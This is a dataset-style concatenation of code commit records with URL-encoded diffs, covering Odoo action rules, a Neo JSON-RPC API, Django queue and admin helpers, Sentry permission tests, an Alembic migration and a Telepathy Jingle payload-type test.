avoid hasattr(self, '_ids') because __getattr__() is overridden if '_ids' in self.__dict__: cr, uid, context = self.env.args ids = self._ids else: while True: if not hasattr(method, 'origin'): break method = method.origin method_arg_names = inspect.getargspec(method)[0][1:len(args) + 1] if not method_arg_names: decorator = method._api and method._api.__name__ if decorator in ('multi', 'one'): method_arg_names = ['cr', 'uid', 'ids'] elif decorator == 'model': method_arg_names = ['cr', 'uid'] elif decorator.startswith('cr_'): method_arg_names = decorator.split('_') else: raise Warning(_('Method not adapted for action rules')) method_arg_names += [None] * (len(args) - len(method_arg_names)) method_args = dict(zip(method_arg_names, args)) cr = method_args.get('cr') or method_args.get('cursor') uid = method_args.get('uid') or method_args.get('user') or method_args.get('user_id') if not isinstance(cr, Cursor) or not isinstance(uid, (int, long)): raise Warning(_('Method not adapted for action rules')) ids = method_args.get('ids') or method_args.get('id') context = method_args.get('context') or {} if kwargs.get('context'): context.update(kwargs['context']) if isinstance(ids, (int, long)): ids = [ids] return cr, uid, ids, context def _get_origin_method(method): if hasattr(origin, '_orig'): return origin._orig elif hasattr(origin, 'origin'): return origin.origin def action_rule_decorator(): def action_rule_wrapper(self, *args, **kwargs): method = action_rule_wrapper.origin cr, uid, ids, context = _get_args(self, method, args, kwargs) # Avoid loops or cascading actions if context and context.get('action'): return method(self, *args, **kwargs) context = dict(context or {}, action=True) # Retrieve the action rules to possibly execute rule_obj = self.pool.get('base.action.rule') rule_ids = rule_obj._get_action_rules(cr, uid, self._name, method, context) rules = rule_obj.browse(cr, uid, rule_ids, context) # Check preconditions pre_ids = {} for rule in rules: if rule.kind not in ('on_create', 'on_create_or_write'): pre_ids[rule] = rule_obj._filter(cr, uid, rule, rule.filter_pre_id, ids, context=context) if rule.kind == 'on_unlink' and pre_ids[rule]: rule_obj._process(cr, uid, rule, pre_ids[rule], context=context) # Call original method res = method(self, *args, **kwargs) # Manage create method origin = method while origin: if origin.__name__ == 'create': pre_ids = pre_ids.fromkeys(rules, [res.id] if hasattr(res, 'id') else [res]) break origin = _get_origin_method(origin) # Check postconditions, and execute actions on the records that satisfy them for rule in rules: if rule.kind != 'on_unlink': post_ids = rule_obj._filter(cr, uid, rule, rule.filter_id, pre_ids.get(rule), context=context) if post_ids: rule_obj._process(cr, uid, rule, post_ids, context=context) return res return action_rule_wrapper
Python
0.000261
@@ -2741,22 +2741,22 @@ hasattr( -origin +method , '_orig @@ -2774,22 +2774,22 @@ return -origin +method ._orig%0A @@ -2804,22 +2804,22 @@ hasattr( -origin +method , 'origi @@ -2838,22 +2838,22 @@ return -origin +method .origin%0A
0301a96b8c9592c58fe41eded24a39d503f4fcb2
Create ExtendedJsonRpcApi.py
neo/api/JSONRPC/ExtendedJsonRpcApi.py
neo/api/JSONRPC/ExtendedJsonRpcApi.py
Python
0
@@ -0,0 +1,1802 @@ +from neo.Core.Blockchain import Blockchain%0Afrom neo.api.JSONRPC.JsonRpcApi import JsonRpcApi, JsonRpcError%0Afrom neo.Implementations.Wallets.peewee.UserWallet import UserWallet%0Afrom neocore.UInt256 import UInt256%0Aimport datetime%0A%0A%0Aclass ExtendedJsonRpcApi:%0A %22%22%22%0A Extended JSON-RPC API Methods%0A %22%22%22%0A%0A def get_node_state(self):%0A height = Blockchain.Default().Height%0A headers = Blockchain.Default().HeaderHeight%0A diff = height - JsonRpcApi.start_height%0A now = datetime.datetime.utcnow()%0A difftime = now - JsonRpcApi.start_dt%0A mins = difftime / datetime.timedelta(minutes=1)%0A secs = mins * 60%0A bpm = 0%0A tps = 0%0A%0A if diff %3E 0 and mins %3E 0:%0A bpm = diff / mins%0A tps = Blockchain.Default().TXProcessed / secs%0A%0A return %7B%0A 'Progress': %5Bheight, %22/%22, headers%5D,%0A 'Block-cache length': Blockchain.Default().BlockCacheCount,%0A 'Blocks since program start': diff,%0A 'Time elapsed (minutes)': mins,%0A 'Blocks per min': bpm,%0A 'TPS': tps%0A %7D%0A%0A def get_tx_history(self):%0A if JsonRpcApi.wallet:%0A res = %5B%5D%0A for tx in JsonRpcApi.wallet.GetTransactions():%0A json = tx.ToJson()%0A tx_id = UInt256.ParseString(json%5B'txid'%5D)%0A txx, height = Blockchain.Default().GetTransaction(tx_id)%0A header = Blockchain.Default().GetHeaderByHeight(height)%0A block_index = header.Index%0A json%5B'block_index'%5D = block_index%0A block_timestamp = header.Timestamp%0A json%5B'blocktime'%5D = block_timestamp%0A res.append(json)%0A return res%0A else:%0A raise JsonRpcError(-400, %22Access denied.%22)%0A
04e7a43c9516fc9834727c3087863c6282da2dbf
Add tests.py to app skeleton.
lib/rapidsms/skeleton/app/tests.py
lib/rapidsms/skeleton/app/tests.py
Python
0
@@ -0,0 +1,543 @@ +from rapidsms.tests.scripted import TestScript%0Afrom app import App%0A%0Aclass TestApp (TestScript):%0A apps = (App,)%0A%0A # define your test scripts here.%0A # e.g.:%0A #%0A # testRegister = %22%22%22%0A # 8005551212 %3E register as someuser%0A # 8005551212 %3C Registered new user 'someuser' for 8005551212!%0A # 8005551212 %3E tell anotheruser what's up??%0A # 8005550000 %3C someuser said %22what's up??%22%0A # %22%22%22%0A #%0A # You can also do normal unittest.TestCase methods:%0A #%0A # def testMyModel (self):%0A # self.assertEquals(...)%0A
d358bf3f103069c2f5a85da15331f808df746064
Bump version
oi/version.py
oi/version.py
VERSION = '0.2.1'
Python
0
@@ -10,9 +10,9 @@ '0. -2.1 +3.0 '%0A
19beca7e8166cbab42937ccbd8e9c705ca4913dd
Bump version
oi/version.py
oi/version.py
VERSION = '0.0.1'
Python
0
@@ -10,9 +10,9 @@ '0. -0.1 +1.0 '%0A
6f2a9cbf9e571855074e898d22480d61277a3eda
Add experimental polling DB backend.
django_lightweight_queue/backends/db.py
django_lightweight_queue/backends/db.py
Python
0
@@ -0,0 +1,2272 @@ +import time%0Aimport datetime%0A%0Afrom django.db import connection, models, ProgrammingError%0A%0Afrom ..job import Job%0A%0Aclass DatabaseBackend(object):%0A TABLE = 'django_lightweight_queue'%0A%0A FIELDS = (%0A models.AutoField(name='id', primary_key=True),%0A models.CharField(name='queue', max_length=255),%0A models.TextField(name='data'),%0A models.DateTimeField(name='created'),%0A )%0A%0A def __init__(self):%0A qn = connection.ops.quote_name%0A%0A sql = %5B%5D%0A for x in self.FIELDS:%0A sql.append(' '.join((%0A qn(x.name),%0A x.db_type(connection=connection),%0A 'PRIMARY KEY' if x.primary_key else '',%0A )))%0A%0A cursor = connection.cursor()%0A cursor.execute('CREATE TABLE IF NOT EXISTS %25s (%5Cn%25s%5Cn);' %25 (%0A qn(self.TABLE),%0A ',%5Cn'.join(sql),%0A ))%0A%0A try:%0A cursor.execute('CREATE INDEX %25s ON %25s (%25s, %25s)' %25 (%0A qn('%25s_idx' %25 self.TABLE),%0A qn(self.TABLE),%0A qn('queue'),%0A qn('created'),%0A ))%0A except ProgrammingError:%0A # %22IF NOT EXISTS%22 is not portable, so we just fail to create it%0A pass%0A%0A # Don't share connections across fork()%0A connection.close()%0A%0A def enqueue(self, job, queue):%0A cursor = connection.cursor()%0A cursor.execute(%22%22%22%0A INSERT INTO %25s (queue, data, created) VALUES (%25%25s, %25%25s, %25%25s)%0A %22%22%22 %25 connection.ops.quote_name(self.TABLE), (%0A queue,%0A job.to_json(),%0A datetime.datetime.utcnow(),%0A ))%0A%0A def dequeue(self, queue, timeout):%0A cursor = connection.cursor()%0A cursor.execute(%22%22%22%0A SELECT id, data FROM %25s WHERE queue = %25%25s%0A ORDER BY created ASC LIMIT 1%0A %22%22%22 %25 connection.ops.quote_name(self.TABLE), (queue,))%0A%0A try:%0A id_, data = cursor.fetchall()%5B0%5D%0A except (IndexError, ProgrammingError):%0A time.sleep(timeout)%0A return%0A%0A cursor.execute(%22%22%22%0A DELETE FROM %25s WHERE id = %25%25s%0A %22%22%22 %25 connection.ops.quote_name(self.TABLE), (id_,))%0A%0A try:%0A return Job.from_json(data)%0A except TypeError:%0A pass%0A
2498e40294cf56f40fb869d30844c3a8223267a0
Create initdb command
initdb.py
initdb.py
Python
0.000001
@@ -0,0 +1,57 @@ +#!/usr/bin/env python%0Afrom app import db%0Adb.create_all()%0A
3c8eb0563f3997fc068d039b18452eaa98da3122
Add a script useful for downloading large avatar images from Atom feeds
download_avatars.py
download_avatars.py
Python
0
@@ -0,0 +1,1462 @@ +#!/usr/bin/env python3%0Aimport PIL.Image%0Aimport io%0Aimport json%0Aimport requests%0A%0Aimport post_list%0Aimport web_cache%0A%0A%0A# Split this file into two modules, because we need to move web_cache out of%0A# the way between the two steps. (We want to isolate the avatar HTTP requests)%0A# into its own thing.%0A%0A%0Adef _make_avatar_url_list():%0A seen = set()%0A with open(%22avatar_urls%22, %22wt%22) as fp:%0A for post in post_list.load_posts():%0A url = %22https://thearchdruidreport.blogspot.com/feeds/%25s/comments/default%22 %5C%0A %22?alt=json&v=2&orderby=published&reverse=false&max-results=1000%22 %25 post.postid%0A js = json.loads(web_cache.get(url).decode(%22utf8%22))%0A for comment in js%5B%22feed%22%5D%5B%22entry%22%5D:%0A (author,) = comment%5B%22author%22%5D%0A avatar = author%5B%22gd$image%22%5D%0A int(avatar%5B%22width%22%5D)%0A int(avatar%5B%22height%22%5D)%0A src = avatar%5B%22src%22%5D%0A if src not in seen:%0A seen.add(src)%0A assert %22%5Cn%22 not in src%0A fp.write(src + %22%5Cn%22)%0A%0A%0Adef _fetch_avatar_urls():%0A urls = open(%22avatar_urls%22, %22r%22).read().splitlines()%0A for i, url in enumerate(urls):%0A print(%22%5B%25d/%25d%5D fetching %25s ...%22 %25 (i + 1, len(urls), url))%0A try:%0A img = PIL.Image.open(io.BytesIO(web_cache.get(url)))%0A except:%0A print(%22WARNING: Bad avatar URL: %25s%22 %25 url)%0A%0A%0A#_make_avatar_url_list()%0A_fetch_avatar_urls()%0A
7e1ea3516aa6b4d41748a9ae63464a32ff16e018
Test variable module
extenteten/variable_test.py
extenteten/variable_test.py
Python
0.000001
@@ -0,0 +1,259 @@ +from .util import static_shape, static_rank%0Afrom .variable import variable%0A%0A%0Adef test_variable():%0A shape = %5B123, 456%5D%0A assert static_shape(variable(shape)) == shape%0A%0A initial = %5Bfloat(n) for n in shape%5D%0A assert static_rank(variable(initial)) == 1%0A
58f85213c72b194fe44da36972436c4e7bbdd681
add sina http util
server/crawler/sinawb/SinaHttpUtil.py
server/crawler/sinawb/SinaHttpUtil.py
Python
0.000002
@@ -0,0 +1,2334 @@ +# -*- coding:utf-8 -*-%0A%22%22%22%0AAuthor: AsherYang%0AEmail : ouyangfan1991@gmail.com%0ADate : 2017/11/22%0ADesc : Sina Http Util %E5%8F%82%E8%80%83 Shserver %E5%BE%AE%E5%BA%97 OpenRequest.py%0A%22%22%22%0A%0Atry:%0A from cStringIO import StringIO%0Aexcept ImportError:%0A from StringIO import StringIO%0Aimport gzip, json, urllib, urllib2, collections,time,logging%0A%0Adef http_get(url,params=%7B%7D,header=%7B%7D):%0A httpUrl=url%0A if params is not None and len(params)%3E0:%0A httpUrl=url+%22?%22+_encode_params(**params)%0A httpUrl=httpUrl.replace(': ',':')%0A httpUrl=httpUrl.replace(', ',',')%0A httpUrl=httpUrl.replace(%22'%22,'%22')%0A print httpUrl%0A req=urllib2.Request(httpUrl,None,headers=header)%0A res=urllib2.urlopen(req)%0A body=_read_body(res)%0A # check_status(body)%0A return body%0A%0Adef http_post(url,params=%7B%7D,header=%7B%7D):%0A req=urllib2.Request(url)%0A for k,v in header:%0A req.add_header(k,v)%0A res=urllib2.urlopen(req,data=params,header=header)%0A body=_read_body(res)%0A # check_status(body)%0A return body%0A%0A# def check_status(resJson,statusName=%22status%22,code=%22status_code%22,reason=%22status_reason%22):%0A# if(resJson is None ):%0A# raise OpenError(%2210001%22,%22%E7%B3%BB%E7%BB%9F%E9%94%99%E8%AF%AF,%E8%BF%94%E5%9B%9E%E7%9A%84%E7%BB%93%E6%9E%9C%E4%B8%BA%E7%A9%BA%22,None)%0A# res_dic=json.loads(resJson)%0A# if(res_dic.get(statusName) is None):%0A# raise OpenError(%2210001%22,%22%E7%B3%BB%E7%BB%9F%E9%94%99%E8%AF%AF,%E7%8A%B6%E6%80%81%E7%A0%81%E4%B8%BA%E7%A9%BA%22,None)%0A# status_code=res_dic.get(statusName).get(code)%0A# status_reason=res_dic.get(statusName).get(reason)%0A# if(0!=status_code and %220%22!=status_code):%0A# raise OpenError(status_code,status_reason,None)%0A%0A%0Adef _encode_params(**kw):%0A params = %5B%5D%0A for k, v in kw.iteritems():%0A if isinstance(v, basestring):%0A qv = v.encode('utf-8') if isinstance(v, unicode) else v%0A params.append('%25s=%25s' %25 (k, urllib.quote(qv)))%0A elif isinstance(v, collections.Iterable):%0A for i in v:%0A qv = i.encode('utf-8') if isinstance(i, unicode) else str(i)%0A params.append('%25s=%25s' %25 (k, urllib.quote(qv)))%0A else:%0A qv = str(v)%0A params.append('%25s=%25s' %25 (k, urllib.quote(qv)))%0A return '&'.join(params)%0A%0A%0Adef _read_body(res):%0A using_gzip = res.headers.get('Content-Encoding', '')=='gzip'%0A body = res.read()%0A if using_gzip:%0A gzipper = gzip.GzipFile(fileobj=StringIO(body))%0A body = gzipper.read()%0A gzipper.close()%0A return body%0A
54285887dc96e3d5d98ca4c02df2a04d49ac69f7
Add TeamPermission tests
tests/sentry/api/bases/test_team.py
tests/sentry/api/bases/test_team.py
Python
0
@@ -0,0 +1,2643 @@ +from __future__ import absolute_import%0A%0Afrom mock import Mock%0A%0Afrom sentry.api.bases.team import TeamPermission%0Afrom sentry.models import ApiKey, OrganizationMemberType, ProjectKey%0Afrom sentry.testutils import TestCase%0A%0A%0Aclass TeamPermissionBase(TestCase):%0A def setUp(self):%0A self.org = self.create_organization()%0A self.team = self.create_team(organization=self.org)%0A super(TeamPermissionBase, self).setUp()%0A%0A def has_object_perm(self, auth, user, obj, method='GET'):%0A perm = TeamPermission()%0A request = Mock()%0A request.auth = auth%0A request.user = user%0A request.method = method%0A return perm.has_object_permission(request, None, obj)%0A%0A%0Aclass TeamPermissionTest(TeamPermissionBase):%0A def test_regular_user(self):%0A user = self.create_user()%0A assert not self.has_object_perm(None, user, self.team)%0A%0A def test_superuser(self):%0A user = self.create_user(is_superuser=True)%0A assert self.has_object_perm(None, user, self.team)%0A%0A def test_org_member_without_team_access(self):%0A user = self.create_user()%0A om = self.create_member(%0A user=user,%0A organization=self.org,%0A type=OrganizationMemberType.MEMBER,%0A has_global_access=False,%0A )%0A assert not self.has_object_perm(None, user, self.team)%0A%0A def test_org_member_with_global_access(self):%0A user = self.create_user()%0A om = self.create_member(%0A user=user,%0A organization=self.org,%0A type=OrganizationMemberType.MEMBER,%0A has_global_access=True,%0A )%0A assert self.has_object_perm(None, user, self.team)%0A%0A def test_org_member_with_team_access(self):%0A user = self.create_user()%0A om = self.create_member(%0A user=user,%0A organization=self.org,%0A type=OrganizationMemberType.MEMBER,%0A has_global_access=False,%0A )%0A om.teams.add(self.team)%0A assert self.has_object_perm(None, user, self.team)%0A%0A def test_project_key(self):%0A key = ProjectKey.objects.create(%0A project=self.create_project(team=self.team),%0A )%0A assert not self.has_object_perm(key, None, self.team)%0A%0A def test_api_key_with_org_access(self):%0A key = ApiKey.objects.create(%0A organization=self.org,%0A )%0A assert self.has_object_perm(key, None, self.team)%0A%0A def test_api_key_without_org_access(self):%0A key = ApiKey.objects.create(%0A organization=self.create_organization(),%0A )%0A assert not self.has_object_perm(key, None, self.team)%0A
aeabc254a09047a58ea5b5c16fb2c5e7e9008691
Test generator expressions
tests/samples/generator_expression.py
tests/samples/generator_expression.py
Python
0.000001
@@ -0,0 +1,1503 @@ +import snoop%0A%0A%0A@snoop(depth=2)%0Adef main():%0A return list(x * 2 for x in %5B1, 2%5D)%0A%0A%0Aif __name__ == '__main__':%0A main()%0A%0Aexpected_output = %22%22%22%0A12:34:56.78 %3E%3E%3E Call to main in File %22/path/to_file.py%22, line 5%0A12:34:56.78 5 %7C def main():%0A12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A 12:34:56.78 %3E%3E%3E Start generator %3Cgenexpr%3E in File %22/path/to_file.py%22, line 6%0A 12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A 12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A 12:34:56.78 .......... Iterating over %3Ctupleiterator object at 0xABC%3E%0A 12:34:56.78 .......... x = 1%0A 12:34:56.78 %3C%3C%3C Yield value from %3Cgenexpr%3E: 2%0A 12:34:56.78 %3E%3E%3E Re-enter generator %3Cgenexpr%3E in File %22/path/to_file.py%22, line 6%0A 12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A 12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A 12:34:56.78 .......... Iterating over %3Ctupleiterator object at 0xABC%3E%0A 12:34:56.78 .......... x = 2%0A 12:34:56.78 %3C%3C%3C Yield value from %3Cgenexpr%3E: 4%0A 12:34:56.78 %3E%3E%3E Re-enter generator %3Cgenexpr%3E in File %22/path/to_file.py%22, line 6%0A 12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A 12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A 12:34:56.78 .......... Iterating over %3Ctupleiterator object at 0xABC%3E%0A 12:34:56.78 .......... x = 2%0A 12:34:56.78 %3C%3C%3C Return value from %3Cgenexpr%3E: None%0A12:34:56.78 6 %7C return list(x * 2 for x in %5B1, 2%5D)%0A12:34:56.78 %3C%3C%3C Return value from main: %5B2, 4%5D%0A%22%22%22%0A
8e049c956045b3d5cc37db0041e71b637f556408
add DB migration
migrations/versions/2316c9808a5_.py
migrations/versions/2316c9808a5_.py
Python
0
@@ -0,0 +1,1103 @@ +%22%22%22empty message%0A%0ARevision ID: 2316c9808a5%0ARevises: 26fbbffb991%0ACreate Date: 2015-04-16 13:46:41.849087%0A%0A%22%22%22%0A%0A# revision identifiers, used by Alembic.%0Arevision = '2316c9808a5'%0Adown_revision = '26fbbffb991'%0A%0Afrom alembic import op%0Aimport sqlalchemy as sa%0A%0A%0Adef upgrade():%0A ### commands auto generated by Alembic - please adjust! ###%0A op.add_column('courses', sa.Column('homepage', sa.Text(), nullable=True))%0A op.add_column('teachers', sa.Column('avatar', sa.Integer(), nullable=True))%0A op.add_column('teachers', sa.Column('homepage', sa.Text(), nullable=True))%0A op.create_foreign_key(None, 'teachers', 'image_store', %5B'avatar'%5D, %5B'id'%5D)%0A op.add_column('users', sa.Column('homepage', sa.Text(), nullable=True))%0A ### end Alembic commands ###%0A%0A%0Adef downgrade():%0A ### commands auto generated by Alembic - please adjust! ###%0A op.drop_column('users', 'homepage')%0A op.drop_constraint(None, 'teachers', type_='foreignkey')%0A op.drop_column('teachers', 'homepage')%0A op.drop_column('teachers', 'avatar')%0A op.drop_column('courses', 'homepage')%0A ### end Alembic commands ###%0A
0ca24ff03f6382c23995f662b678e457a8394140
Add script to bump symbol versions
debian/bump-symbols.py
debian/bump-symbols.py
Python
0
@@ -0,0 +1,1090 @@ +#!/usr/bin/python%0A#%0A# Bump symbol versions of libvirt0%0A%0A# Usage: ./bump-symbol-versions 1.2.16~rc2%0A%0Aimport os%0Aimport re%0Aimport sys%0Aimport shutil%0Aimport subprocess%0A%0A#import gbp.git.GitRepository%0A%0Asymbols_file = 'debian/libvirt0.symbols'%0Asymbols_new_file = symbols_file + '.new'%0A%0Asymbols = open(symbols_file)%0Asymbols_new = open('%25s.new' %25 symbols_file, 'w+')%0A%0Aif len(sys.argv) != 2:%0A print %3E%3Esys.stderr, %22Need a version%22%0A sys.exit(1)%0A%0Aversion = sys.argv%5B1%5D%0As_version = version.split('~', 1)%5B0%5D%0A%0Afor line in symbols.readlines():%0A m = re.match('(?P%3Cpre%3E.*LIBVIRT_(?P%3Cadmin%3EADMIN_)?PRIVATE_)(?P%3Cv%3E%5Ba-z0-9.%5D+) ',%0A line)%0A if m:%0A if not m.group('admin'):%0A symbols_new.write(' *@LIBVIRT_%25s %25s%5Cn' %25 (s_version, version))%0A symbols_new.write(%22%25s%25s %25s%5Cn%22 %25%0A (m.group('pre'), s_version, version))%0A else:%0A symbols_new.write(line)%0A%0A%0Asymbols.close()%0Asymbols_new.close()%0A%0Aos.unlink(symbols_file)%0Ashutil.move(symbols_new_file, symbols_file)%0Asubprocess.call(%5B'git', 'commit', '-m', 'Bump symbol versions', symbols_file%5D)%0A%0A
4435eb504b10855088f006456dfface89a4a8798
create first easy mixin
easy/admin/mixin.py
easy/admin/mixin.py
Python
0
@@ -0,0 +1,1668 @@ +# coding: utf-8%0Afrom django.conf.urls import url%0Afrom django.contrib import messages%0Afrom django.core.urlresolvers import reverse%0Afrom django.http.response import HttpResponseRedirect%0A%0A%0Aclass MixinEasyViews(object):%0A%0A def get_urls(self):%0A urls = super(MixinEasyViews, self).get_urls()%0A%0A info = self.model._meta.app_label, self.model._meta.model_name%0A%0A easy_urls = %5B%0A url(r'%5E(?P%3Cpk%3E.+)/easy/(?P%3Caction%3E.+)/$', self.admin_site.admin_view(self.easy_object_view),%0A name='%25s_%25s_easy' %25 info),%0A%0A url(r'%5Eeasy/(?P%3Caction%3E.+)/$', self.admin_site.admin_view(self.easy_list_view),%0A name='%25s_%25s_easy' %25 info),%0A %5D%0A%0A return easy_urls + urls%0A%0A def easy_object_view(self, request, pk, action):%0A%0A method_name = 'easy_view_%25s' %25 action%0A%0A view = getattr(self, method_name, None)%0A if view:%0A return view(request, pk)%0A%0A self.message_user(request, 'Easy view %25s not founded' %25 method_name, messages.ERROR)%0A%0A info = self.model._meta.app_label, self.model._meta.model_name%0A redirect = reverse('admin:%25s_%25s_change' %25 info, args=(pk,))%0A%0A return HttpResponseRedirect(redirect)%0A%0A def easy_list_view(self, request, action):%0A method_name = 'easy_view_%25s' %25 action%0A%0A view = getattr(self, method_name, None)%0A if view:%0A return view(request)%0A%0A self.message_user(request, 'Easy view %25s not founded' %25 method_name, messages.ERROR)%0A%0A info = self.model._meta.app_label, self.model._meta.model_name%0A redirect = reverse('admin:%25s_%25s_changelist' %25 info,)%0A%0A return HttpResponseRedirect(redirect)
a5950853ae7cfe9ac4fce7f297722231feae2f44
switch if/else per David's review comments
plaid/http.py
plaid/http.py
############################################################################## # Helper module that encapsulates the HTTPS request so that it can be used # with multiple runtimes. PK Mar. 14 ############################################################################## import os import urllib # Command line def _requests_http_request(url, method, data): import requests if method.upper() == 'GET': return requests.get(url, data = data) elif method.upper() == 'POST': return requests.post(url, data = data) elif method.upper() == 'PUT': return requests.put(url, data = data) elif method.upper() == 'DELETE': return requests.delete(url, data = data) elif method.upper() == 'PATCH': return requests.patch(url, data = data) assert False # Google App Engine def _urlfetch_http_request(url, method, data): from google.appengine.api import urlfetch method = method.upper() qs = urllib.urlencode(data) if method == 'POST': payload = qs else: payload = None url += '?' + qs response = urlfetch.fetch(url, follow_redirects = True, method = method, payload = payload ) response.ok = response.status_code >= 200 and response.status_code < 300 return response _is_appengine = None def http_request(url, method, data = {}): global _is_appengine if _is_appengine is None: ss = os.environ.get('SERVER_SOFTWARE', None) _is_appengine = (ss and (ss.startswith('Development/') or ss.startswith('Google App Engine/'))) if not _is_appengine: return _requests_http_request(url, method, data) else: return _urlfetch_http_request(url, method, data)
Python
0
@@ -1588,12 +1588,8 @@ if -not _is_ @@ -1615,24 +1615,24 @@ return _ -requests +urlfetch _http_re @@ -1678,32 +1678,32 @@ return _ -urlfetch +requests _http_reques @@ -1716,16 +1716,26 @@ method, data)%0A%0A + %0A%0A
8bf370724f92aef0783cb1d15f1c2a39ca9986c4
define a MEDIA_STREAM_TYPE_AUDIO constant
tests/twisted/jingle/payload-types.py
tests/twisted/jingle/payload-types.py
""" Regression test for https://bugs.freedesktop.org/show_bug.cgi?id=18918 """ from gabbletest import exec_test, make_result_iq, sync_stream, \ send_error_reply from servicetest import make_channel_proxy, unwrap, tp_path_prefix, \ call_async, EventPattern from twisted.words.xish import domish import jingletest import gabbletest import dbus import time def test(q, bus, conn, stream): jt = jingletest.JingleTest(stream, 'test@localhost', 'foo@bar.com/Foo') # Connecting conn.Connect() q.expect('dbus-signal', signal='StatusChanged', args=[1, 1]) q.expect('stream-authenticated') q.expect('dbus-signal', signal='PresenceUpdate', args=[{1L: (0L, {u'available': {}})}]) q.expect('dbus-signal', signal='StatusChanged', args=[0, 1]) self_handle = conn.GetSelfHandle() # We need remote end's presence for capabilities jt.send_remote_presence() # Gabble doesn't trust it, so makes a disco event = q.expect('stream-iq', query_ns='http://jabber.org/protocol/disco#info', to='foo@bar.com/Foo') jt.send_remote_disco_reply(event.stanza) # Force Gabble to process the caps before calling RequestChannel sync_stream(q, stream) handle = conn.RequestHandles(1, [jt.remote_jid])[0] path = conn.RequestChannel( 'org.freedesktop.Telepathy.Channel.Type.StreamedMedia', 1, handle, True) channel = bus.get_object(conn.bus_name, path) signalling_iface = make_channel_proxy(conn, path, 'Channel.Interface.MediaSignalling') media_iface = make_channel_proxy(conn, path, 'Channel.Type.StreamedMedia') group_iface = make_channel_proxy(conn, path, 'Channel.Interface.Group') # FIXME: Hack to make sure the disco info has been processed - we need to # send Gabble some XML that will cause an event when processed, and # wait for that event (until # https://bugs.freedesktop.org/show_bug.cgi?id=15769 is fixed) el = domish.Element(('jabber.client', 'presence')) el['from'] = 'bob@example.com/Bar' stream.send(el.toXml()) q.expect('dbus-signal', signal='PresenceUpdate') # OK, now we can continue. End of hack # Test that codec parameters are correctly sent in <parameter> children of # <payload-type> rather than as attributes of the latter. media_iface.RequestStreams(handle, [0]) # 0 == MEDIA_STREAM_TYPE_AUDIO # S-E gets notified about new session handler, and calls Ready on it e = q.expect('dbus-signal', signal='NewSessionHandler') assert e.args[1] == 'rtp' session_handler = make_channel_proxy(conn, e.args[0], 'Media.SessionHandler') session_handler.Ready() e = q.expect('dbus-signal', signal='NewStreamHandler') stream_id = e.args[1] stream_handler = make_channel_proxy(conn, e.args[0], 'Media.StreamHandler') stream_handler.NewNativeCandidate("fake", jt.get_remote_transports_dbus()) codecs = dbus.Array( [ (96, 'speex', 0, 16000, 0, {'vbr': 'on'}) ], signature='(usuuua{ss})') stream_handler.Ready(codecs) stream_handler.StreamState(2) e = q.expect('stream-iq') content = list(e.query.elements())[0] assert content.name == 'content' for child in content.elements(): if child.name == 'description': description = child break assert description is not None # there should be one <payload-type> tag for speex: assert len(list(description.elements())) == 1 payload_type = list(description.elements())[0] assert payload_type.name == 'payload-type' assert payload_type['name'] == 'speex' # the vbr parameter should not be an attribute on the <payload-type>, but # a child <parameter/> tag assert 'vbr' not in payload_type.attributes assert len(list(payload_type.elements())) == 1 parameter = list(payload_type.elements())[0] assert parameter.name == 'parameter' assert parameter['name'] == 'vbr' assert parameter['value'] == 'on' channel.Close() # Test that codec parameters are correctly extracted from <parameter> # children of <payload-type> rather than from attributes of the latter. jt.incoming_call({'misc': 'other'}) e = q.expect('dbus-signal', signal='NewSessionHandler') assert e.args[1] == 'rtp' session_handler = make_channel_proxy(conn, e.args[0], 'Media.SessionHandler') session_handler.Ready() e = q.expect('dbus-signal', signal='NewStreamHandler') stream_id = e.args[1] stream_handler = make_channel_proxy(conn, e.args[0], 'Media.StreamHandler') stream_handler.Ready( dbus.Array( [], signature='(usuuua{ss})')) e = q.expect('dbus-signal', signal='SetRemoteCodecs') for codec in e.args[0]: id, name, type, rate, channels, parameters = codec assert len(parameters) == 1, parameters assert parameters['misc'] == 'other', parameters print e.args[0] # Test completed, close the connection conn.Disconnect() q.expect('dbus-signal', signal='StatusChanged', args=[2, 1]) return True if __name__ == '__main__': exec_test(test)
Python
0.000017
@@ -365,16 +365,44 @@ t time%0A%0A +MEDIA_STREAM_TYPE_AUDIO = 0%0A %0Adef tes @@ -2376,19 +2376,8 @@ e, %5B -0%5D) # 0 == MEDI @@ -2395,16 +2395,18 @@ PE_AUDIO +%5D) %0A%0A #